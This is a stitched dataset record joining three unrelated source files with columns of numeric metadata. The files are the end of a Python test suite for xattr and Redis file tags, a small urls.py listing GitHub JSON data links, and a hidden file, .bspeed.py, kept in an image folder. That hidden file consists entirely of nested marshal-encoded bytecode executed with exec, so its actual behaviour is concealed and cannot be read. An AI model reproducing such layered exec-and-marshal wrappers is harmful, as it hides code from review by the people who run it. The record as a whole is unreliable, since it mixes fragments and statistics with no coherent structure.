        r.hset(x._redis_key, 'rick', 'morty')
        x._read_tags()
        self.assertEqual(x.tags['rick'], b'morty')

    def test_16_delete_redis_empty(self):
        """delete() also removes the file's tag hash from Redis."""
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        tmp_data_file_path = os.path.join(self.test_data_dir_path,
                                          u'test_file.tmp')
        x = make_xattrfile(test_data_file_path)
        x.tags['key1'] = b'value1'
        x.copy(tmp_data_file_path)
        y = make_xattrfile(tmp_data_file_path)
        y.delete()
        r = x.get_redis_callable()
        self.assertFalse(r.exists(y._redis_key))

    def test_22_write_tags(self):
        """write_tags_in_a_file serializes str and unicode tag values to a file."""
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        tmp_data_file_path = os.path.join(self.test_data_dir_path,
                                          u'test_file.tmp')
        x = make_xattrfile(test_data_file_path)
        x.tags['bar'] = 'bar'
        x.tags['foo'] = u"foo ééé"
        print(x.tags)
        x.write_tags_in_a_file(tmp_data_file_path)
        os.unlink(tmp_data_file_path)

    def test_23_unicode(self):
        """After commit(), str/bytes/unicode tag values all read back as bytes."""
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        tmp_data_file_path = os.path.join(self.test_data_dir_path,
                                          u'test_file.tmp')
        x = make_xattrfile(test_data_file_path)
        x.copy(tmp_data_file_path)
        y = make_xattrfile(tmp_data_file_path)
        y.tags['basic'] = 'basic'
        y.tags[b'bytes'] = b'bytes'
        y.tags[u'unicode'] = u'unicode ééé'
        y.commit()
        y._read_tags()
        self.assertEqual(y.tags['basic'], b'basic')
        self.assertEqual(y.tags[b'bytes'], b'bytes')
        self.assertEqual(y.tags[u'unicode'].decode('utf8'), u'unicode ééé')
        y.delete()
| 43.875
| 79
| 0.590954
| 1,900
| 14,040
| 3.97
| 0.073158
| 0.131513
| 0.154315
| 0.095453
| 0.817447
| 0.800477
| 0.777277
| 0.758452
| 0.736047
| 0.719873
| 0
| 0.015913
| 0.315171
| 14,040
| 319
| 80
| 44.012539
| 0.768591
| 0.006054
| 0
| 0.702422
| 0
| 0
| 0.069381
| 0.001935
| 0
| 0
| 0
| 0
| 0.145329
| 1
| 0.083045
| false
| 0
| 0.017301
| 0.00346
| 0.117647
| 0.00346
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
25ab815a25cf8a0ac380d6ab3af840d7871b51b6
| 228
|
py
|
Python
|
db/urls.py
|
kavanc/data-management-lab-7
|
d183c6ab0313233028b68eae9e39295ec5ccadc4
|
[
"MIT"
] | null | null | null |
db/urls.py
|
kavanc/data-management-lab-7
|
d183c6ab0313233028b68eae9e39295ec5ccadc4
|
[
"MIT"
] | null | null | null |
db/urls.py
|
kavanc/data-management-lab-7
|
d183c6ab0313233028b68eae9e39295ec5ccadc4
|
[
"MIT"
] | 3
|
2020-11-18T20:20:48.000Z
|
2020-11-25T18:40:05.000Z
|
# Raw GitHub URLs of the JSON data files (players and teams) consumed by the db app.
urls = [
    'https://raw.githubusercontent.com/Badr1600/data-management-lab-7/master/db/data/players.json',
    'https://raw.githubusercontent.com/Badr1600/data-management-lab-7/master/db/data/teams.json'
]
| 38
| 101
| 0.714912
| 30
| 228
| 5.433333
| 0.533333
| 0.09816
| 0.306748
| 0.343558
| 0.809816
| 0.809816
| 0.809816
| 0.809816
| 0.809816
| 0.809816
| 0
| 0.049505
| 0.114035
| 228
| 5
| 102
| 45.6
| 0.757426
| 0.030702
| 0
| 0
| 0
| 0.5
| 0.83105
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
25c80124b2842b414dafc33b79fd3c3f25ac4e46
| 87,424
|
py
|
Python
|
core/pattern/_img/.bspeed.py
|
alimdsoban/bpat
|
bde9b15c81f782d9280c8e13a450b3b95f8d203c
|
[
"MIT"
] | 27
|
2020-06-18T06:35:30.000Z
|
2022-03-26T09:15:58.000Z
|
core/pattern/_img/.bspeed.py
|
alimdsoban/bpat
|
bde9b15c81f782d9280c8e13a450b3b95f8d203c
|
[
"MIT"
] | null | null | null |
core/pattern/_img/.bspeed.py
|
alimdsoban/bpat
|
bde9b15c81f782d9280c8e13a450b3b95f8d203c
|
[
"MIT"
] | 5
|
2020-07-31T13:15:22.000Z
|
2021-12-13T21:36:13.000Z
|
import marshal
exec marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x94\x80\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xfe\x7f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsh\x7f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd2~\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs<~\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa6}\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x10}\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsz|\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00
\x00i\xff\xff\xff\xffNs\xe4{\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsN{\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb8z\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs"z\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x8cy\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf6x\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs`x\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xcaw\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs4w\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00
\x00\x00i\xff\xff\xff\xffNs\x9ev\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x08v\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsru\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xdct\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsFt\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb0s\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x1as\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x84r\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xeeq\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00
S(\x03\x00\x00\x00i\xff\xff\xff\xffNsXq\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc2p\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs,p\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x96o\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x00o\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsjn\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd4m\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs>m\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa8l\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01
\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x12l\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs|k\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe6j\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsPj\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xbai\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs$i\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x8eh\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf8g\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsbg\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud
\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xccf\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs6f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa0e\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\ne\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNstd\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xdec\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsHc\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb2b\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x1cb\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\
x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x86a\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf0`\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsZ`\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc4_\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs._\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x98^\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x02^\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsl]\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd6\\\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\
x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs@\\\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xaa[\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x14[\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs~Z\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe8Y\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsRY\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xbcX\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs&X\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x90W\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00